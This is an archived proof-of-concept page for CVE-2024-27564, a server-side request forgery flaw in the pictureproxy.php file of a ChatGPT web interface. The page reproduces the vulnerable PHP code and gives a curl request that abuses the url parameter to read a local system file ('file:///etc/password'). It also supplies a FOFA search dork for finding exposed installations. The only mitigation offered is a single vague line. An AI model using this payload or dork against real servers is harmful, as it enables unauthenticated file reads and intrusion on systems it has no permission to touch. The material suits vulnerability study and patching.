CVE-2024-27564 PoC — ChatGPT 安全漏洞

Source

https://github.com/Quantum-Hacker/CVE-2024-27564

Associated Vulnerability

Title:ChatGPT 安全漏洞 (CVE-2024-27564)
Description:ChatGPT是一个基于OpenAI ChatGPT项目API的可视化界面站点。 ChatGPT commit f9f4bbc版本存在安全漏洞，该漏洞源于存在服务器请求伪造（SSRF）漏洞。攻击者可利用该漏洞通过向urlparameter注入特制的URL来迫使应用程序执行任意请求。

Readme

# CVE-2024-27564

## Description:
A vulnerability in `pictureproxy.php` allows remote attackers to perform arbitrary requests by injecting URLs into the url parameter. This SSRF vulnerability can be exploited without authentication, making it particularly dangerous.

The vulnerable code is in the `pictureproxy.php` file. The issue occurs because the function does not properly validate the `url` parameter. The `$_GET['url']` variable is passed to the `file_get_contents()` function, which fetches content from the specified URL. This can lead to SSRF.

## PoC:
```
<?php
if (isset($_GET['url'])) {
    $image = file_get_contents($_GET['url']);
    header("Content-type: image/jpeg");
    echo $image;
} else {
    echo "Invalid request";
}
```

Curl Request:
```
curl -i -s -k http://127.0.0.1/pictureproxy.php?url=file:///etc/password
```

## Dorking:
FOFA= `"title="ChatGPT个人专用版""`

## Mitigation:
Proper Management of Input validation is needed.

File Snapshot


 [4.0K]  /data/pocs/10e41a4cb5c25e4755729d95907e3da80e356769
├── [ 756]  chatgpt.yaml
└── [ 962]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!